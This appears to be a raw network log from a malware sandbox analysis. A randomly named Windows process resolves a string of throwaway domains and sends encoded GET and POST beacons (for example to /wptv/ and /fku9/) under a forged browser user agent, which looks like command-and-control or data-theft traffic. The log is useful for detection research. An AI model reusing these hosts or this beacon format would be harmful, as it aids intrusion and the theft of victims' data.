Jul 26, 2024 18:47:58.295202017 CEST  63053  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:47:58.309937000 CEST  53  63053  1.1.1.1  192.168.2.5
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Jul 26, 2024 18:45:50.269546986 CEST  192.168.2.5  1.1.1.1  0x9870  Standard query (0)  www.toppersbusiness.net  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:11.850596905 CEST  192.168.2.5  1.1.1.1  0xcf28  Standard query (0)  www.rajveena.online  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:25.201191902 CEST  192.168.2.5  1.1.1.1  0xa4a3  Standard query (0)  www.76716e97778bac2e.com  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:26.213613033 CEST  192.168.2.5  1.1.1.1  0xa4a3  Standard query (0)  www.76716e97778bac2e.com  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:29.879143953 CEST  192.168.2.5  1.1.1.1  0x4d3f  Standard query (0)  www.76716e97778bac2e.com  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:30.873960972 CEST  192.168.2.5  1.1.1.1  0x4d3f  Standard query (0)  www.76716e97778bac2e.com  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:36.095433950 CEST  192.168.2.5  1.1.1.1  0xc0  Standard query (0)  www.pqnqxn.xyz  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:49.577018976 CEST  192.168.2.5  1.1.1.1  0xec1a  Standard query (0)  www.lovezi.shop  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:02.961139917 CEST  192.168.2.5  1.1.1.1  0x4694  Standard query (0)  www.artfulfusionhub.lat  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:17.052340031 CEST  192.168.2.5  1.1.1.1  0xf749  Standard query (0)  www.9muyiutyt.online  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:30.906625032 CEST  192.168.2.5  1.1.1.1  0x7075  Standard query (0)  www.suntextmeetings.online  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:44.703351974 CEST  192.168.2.5  1.1.1.1  0xbb2d  Standard query (0)  www.gridban.xyz  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:58.295202017 CEST  192.168.2.5  1.1.1.1  0xdf0a  Standard query (0)  www.xawcfzcql9tcvj.shop  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Jul 26, 2024 18:45:50.651097059 CEST  1.1.1.1  192.168.2.5  0x9870  No error (0)  www.toppersbusiness.net  toppersbusiness.net  -  CNAME (Canonical name)  IN (0x0001)  false
Jul 26, 2024 18:45:50.651097059 CEST  1.1.1.1  192.168.2.5  0x9870  No error (0)  toppersbusiness.net  -  178.212.35.248  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:11.922832966 CEST  1.1.1.1  192.168.2.5  0xcf28  No error (0)  www.rajveena.online  rajveena.online  -  CNAME (Canonical name)  IN (0x0001)  false
Jul 26, 2024 18:46:11.922832966 CEST  1.1.1.1  192.168.2.5  0xcf28  No error (0)  rajveena.online  -  84.32.84.32  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:36.111792088 CEST  1.1.1.1  192.168.2.5  0xc0  No error (0)  www.pqnqxn.xyz  -  104.21.59.240  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:36.111792088 CEST  1.1.1.1  192.168.2.5  0xc0  No error (0)  www.pqnqxn.xyz  -  172.67.185.114  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:46:49.629254103 CEST  1.1.1.1  192.168.2.5  0xec1a  No error (0)  www.lovezi.shop  lovezi.shop  -  CNAME (Canonical name)  IN (0x0001)  false
Jul 26, 2024 18:46:49.629254103 CEST  1.1.1.1  192.168.2.5  0xec1a  No error (0)  lovezi.shop  -  84.32.84.32  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:02.979382038 CEST  1.1.1.1  192.168.2.5  0x4694  No error (0)  www.artfulfusionhub.lat  -  188.114.96.3  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:02.979382038 CEST  1.1.1.1  192.168.2.5  0x4694  No error (0)  www.artfulfusionhub.lat  -  188.114.97.3  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:17.100346088 CEST  1.1.1.1  192.168.2.5  0xf749  No error (0)  www.9muyiutyt.online  8fyhweb.xaomenlebo008.com  -  CNAME (Canonical name)  IN (0x0001)  false
Jul 26, 2024 18:47:17.100346088 CEST  1.1.1.1  192.168.2.5  0xf749  No error (0)  8fyhweb.xaomenlebo008.com  8fyhback.javalebogame008.com  -  CNAME (Canonical name)  IN (0x0001)  false
Jul 26, 2024 18:47:17.100346088 CEST  1.1.1.1  192.168.2.5  0xf749  No error (0)  8fyhback.javalebogame008.com  -  154.218.3.243  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:30.939110041 CEST  1.1.1.1  192.168.2.5  0x7075  No error (0)  www.suntextmeetings.online  suntextmeetings.online  -  CNAME (Canonical name)  IN (0x0001)  false
Jul 26, 2024 18:47:30.939110041 CEST  1.1.1.1  192.168.2.5  0x7075  No error (0)  suntextmeetings.online  -  148.66.138.133  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:44.730062962 CEST  1.1.1.1  192.168.2.5  0xbb2d  No error (0)  www.gridban.xyz  -  162.254.38.56  A (IP address)  IN (0x0001)  false
Jul 26, 2024 18:47:58.309937000 CEST  1.1.1.1  192.168.2.5  0xdf0a  No error (0)  www.xawcfzcql9tcvj.shop  xawcfzcql9tcvj.shop  -  CNAME (Canonical name)  IN (0x0001)  false
Jul 26, 2024 18:47:58.309937000 CEST  1.1.1.1  192.168.2.5  0xdf0a  No error (0)  xawcfzcql9tcvj.shop  -  142.171.29.133  A (IP address)  IN (0x0001)  false
• www.toppersbusiness.net
• www.rajveena.online
• www.pqnqxn.xyz
• www.lovezi.shop
• www.artfulfusionhub.lat
• www.9muyiutyt.online
• www.suntextmeetings.online
• www.gridban.xyz
• www.xawcfzcql9tcvj.shop
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.5  55138  178.212.35.248  80  7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp  Bytes transferred  Direction  Data
Jul 26, 2024 18:45:50.700043917 CEST  473  OUT  GET /hugu/?ejlto=QtkhctgpxJahPP0&1Hg=vP/uG1dCvZ4PilGLFureb44eipjsuOvQXbL49xadF8bamHBm064La/heTQ4Pfno94C0sjxAGfQAAlyvLUXQlTtZB4zIUvEoM3zQ61bjQ13shwgtlO8h70X3QY/xUTFtAQA== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Host: www.toppersbusiness.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Jul 26, 2024 18:45:51.754302025 CEST  1236  IN  HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Fri, 26 Jul 2024 16:45:51 GMT
server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jul 26, 2024 18:45:51.755496025 CEST  253  IN  Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.5  55139  84.32.84.32  80  7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp  Bytes transferred  Direction  Data
Jul 26, 2024 18:46:11.955506086 CEST  722  OUT  POST /wptv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 204
Host: www.rajveena.online
Origin: http://www.rajveena.online
Referer: http://www.rajveena.online/wptv/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 5a 44 79 79 65 2f 41 5a 32 78 58 4a 43 66 35 61 72 69 61 39 6b 4a 6c 54 6c 4e 4d 7a 4f 45 4a 32 67 5a 6d 69 35 7a 75 50 61 78 68 38 32 59 2f 6a 6f 76 47 75 67 63 6d 54 75 41 46 5a 45 50 66 59 47 41 62 39 76 4e 66 74 33 30 7a 62 53 36 72 32 54 61 49 48 45 73 6d 49 55 72 70 2b 55 62 2b 34 56 48 6e 38 33 64 4f 6c 5a 54 32 52 72 65 41 6f 47 72 62 6a 6d 36 58 75 67 4a 59 57 51 36 31 79 52 73 69 62 4d 58 37 69 46 72 51 6a 2b 48 4d 6b 38 54 49 77 68 4e 36 45 70 41 55 4c 73 51 31 50 55 4a 51 63 30 38 34 72 62 56 68 7a 47 76 42 73 43 55 64 4b 54 63 66 74 4f 68 6f 41 51 63 74 66 72 74 4e 47 5a 4d 41 3d
                                                          Data Ascii: 1Hg=ZDyye/AZ2xXJCf5aria9kJlTlNMzOEJ2gZmi5zuPaxh82Y/jovGugcmTuAFZEPfYGAb9vNft30zbS6r2TaIHEsmIUrp+Ub+4VHn83dOlZT2RreAoGrbjm6XugJYWQ61yRsibMX7iFrQj+HMk8TIwhN6EpAULsQ1PUJQc084rbVhzGvBsCUdKTcftOhoAQctfrtNGZMA=


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
2  192.168.2.5  55140  84.32.84.32  80  7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp  Bytes transferred  Direction  Data
Jul 26, 2024 18:46:14.524668932 CEST  742  OUT  POST /wptv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 224
Host: www.rajveena.online
Origin: http://www.rajveena.online
Referer: http://www.rajveena.online/wptv/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 5a 44 79 79 65 2f 41 5a 32 78 58 4a 44 38 68 61 75 46 47 39 6d 70 6b 68 70 74 4d 7a 45 6b 4a 74 67 5a 71 69 35 33 32 66 5a 44 46 38 32 35 50 6a 35 64 75 75 6e 63 6d 54 38 67 46 63 4a 76 65 31 47 41 47 41 76 49 2f 74 33 30 58 62 53 37 37 32 54 4e 63 41 56 73 6d 57 4e 37 70 34 62 37 2b 34 56 48 6e 38 33 64 61 50 5a 54 2b 52 72 50 51 6f 48 4b 62 67 36 71 58 70 77 70 59 57 64 61 31 75 52 73 69 39 4d 57 58 49 46 6f 6f 6a 2b 48 38 6b 79 69 49 2f 32 64 36 47 6a 67 56 6a 73 52 6b 30 4d 71 34 6e 32 71 38 6a 59 57 68 31 48 5a 73 47 59 32 56 69 41 38 7a 56 65 79 67 33 42 73 4d 32 78 4f 64 32 48 62 57 6d 36 79 66 38 55 67 6b 2b 55 62 53 33 39 48 4a 78 2f 35 2f 4d
                                                          Data Ascii: 1Hg=ZDyye/AZ2xXJD8hauFG9mpkhptMzEkJtgZqi532fZDF825Pj5duuncmT8gFcJve1GAGAvI/t30XbS772TNcAVsmWN7p4b7+4VHn83daPZT+RrPQoHKbg6qXpwpYWda1uRsi9MWXIFooj+H8kyiI/2d6GjgVjsRk0Mq4n2q8jYWh1HZsGY2ViA8zVeyg3BsM2xOd2HbWm6yf8Ugk+UbS39HJx/5/M


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
3  192.168.2.5  55141  84.32.84.32  80  7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp  Bytes transferred  Direction  Data
Jul 26, 2024 18:46:17.093008995 CEST  1759  OUT  POST /wptv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 1240
Host: www.rajveena.online
Origin: http://www.rajveena.online
Referer: http://www.rajveena.online/wptv/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 5a 44 79 79 65 2f 41 5a 32 78 58 4a 44 38 68 61 75 46 47 39 6d 70 6b 68 70 74 4d 7a 45 6b 4a 74 67 5a 71 69 35 33 32 66 5a 44 4e 38 32 76 54 6a 6f 4d 75 75 6d 63 6d 54 6e 67 46 6e 4a 76 66 33 47 41 66 4c 76 49 79 57 33 32 2f 62 53 63 37 32 43 4d 63 41 63 73 6d 57 46 62 70 39 55 62 2b 68 56 47 58 6a 33 64 4b 50 5a 54 2b 52 72 4d 59 6f 4f 37 62 67 71 61 58 75 67 4a 59 61 51 36 31 53 52 73 71 44 4d 57 6a 79 46 59 49 6a 2b 6e 73 6b 77 51 51 2f 70 74 36 59 67 67 56 37 73 52 6f 72 4d 72 55 61 32 71 68 34 59 57 5a 31 4b 4f 4e 42 46 58 4a 69 53 39 2f 42 66 53 51 79 44 72 41 4a 2f 4f 56 4d 4b 59 6e 44 33 52 75 53 5a 6d 41 43 42 71 33 66 71 79 78 56 7a 39 75 32 77 71 54 55 55 4f 35 31 51 65 62 38 7a 4b 31 6a 2f 68 46 63 43 55 59 62 62 4d 4f 77 78 6b 69 70 6b 41 46 74 54 36 65 4e 6c 35 57 6e 4b 4d 2b 44 31 73 62 74 55 68 72 66 63 31 63 78 74 76 53 70 53 47 75 48 43 2f 48 68 4f 6d 75 72 63 38 4f 78 54 77 6f 46 57 34 50 73 74 35 4e 6d 59 52 4f 44 78 58 63 42 39 6b 37 42 69 4c 6f 73 55 79 49 72 42 56 [TRUNCATED]
                                                          Data Ascii: 1Hg=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 [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.5  55142        84.32.84.32     80                7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp                             Bytes transferred  Direction  Data
Jul 26, 2024 18:46:19.667263985 CEST  469                OUT        GET /wptv/?1Hg=UBaSdI4L0SLSC905rDSQkq9H8MI7DUlv5ISEnSSRcSh4rK6z4u+7wt/PvR1ecI/XTQn9u86KuHymNqf2TqtSEsuZKbYYXqmtSyS/3vOPWUm+34EGC7zgpqm6nqQHfZAfNA==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.rajveena.online
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Jul 26, 2024 18:46:20.132971048 CEST  1236               IN         HTTP/1.1 200 OK
                                                          Server: hcdn
                                                          Date: Fri, 26 Jul 2024 16:46:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 10072
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          alt-svc: h3=":443"; ma=86400
                                                          x-hcdn-request-id: 1a6f29ca88dbfcaeb39fde964a5e0465-bos-edge1
                                                          Expires: Fri, 26 Jul 2024 16:46:19 GMT
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
Jul 26, 2024 18:46:20.133296967 CEST  1236               IN         Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                          Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
Jul 26, 2024 18:46:20.133308887 CEST  1236               IN         Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                          Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
Jul 26, 2024 18:46:20.134790897 CEST  1236               IN         Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                          Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
Jul 26, 2024 18:46:20.134804964 CEST  1236               IN         Data Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                          Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
Jul 26, 2024 18:46:20.137044907 CEST  1236               IN         Data Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                          Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
Jul 26, 2024 18:46:20.137059927 CEST  1236               IN         Data Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                          Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
Jul 26, 2024 18:46:20.137068033 CEST  108                IN         Data Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                          Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g
Jul 26, 2024 18:46:20.139771938 CEST  1236               IN         Data Raw: 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76
                                                          Data Ascii: <=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.charCode
Jul 26, 2024 18:46:20.139789104 CEST  416                IN         Data Raw: 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78 6e 2d 2d 22 2b 70 75 6e
                                                          Data Ascii: ."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?punycode.dec


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.5  55143        104.21.59.240   80                7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp                             Bytes transferred  Direction  Data
Jul 26, 2024 18:46:36.144392014 CEST  707                OUT        POST /fku9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.pqnqxn.xyz
                                                          Origin: http://www.pqnqxn.xyz
                                                          Referer: http://www.pqnqxn.xyz/fku9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
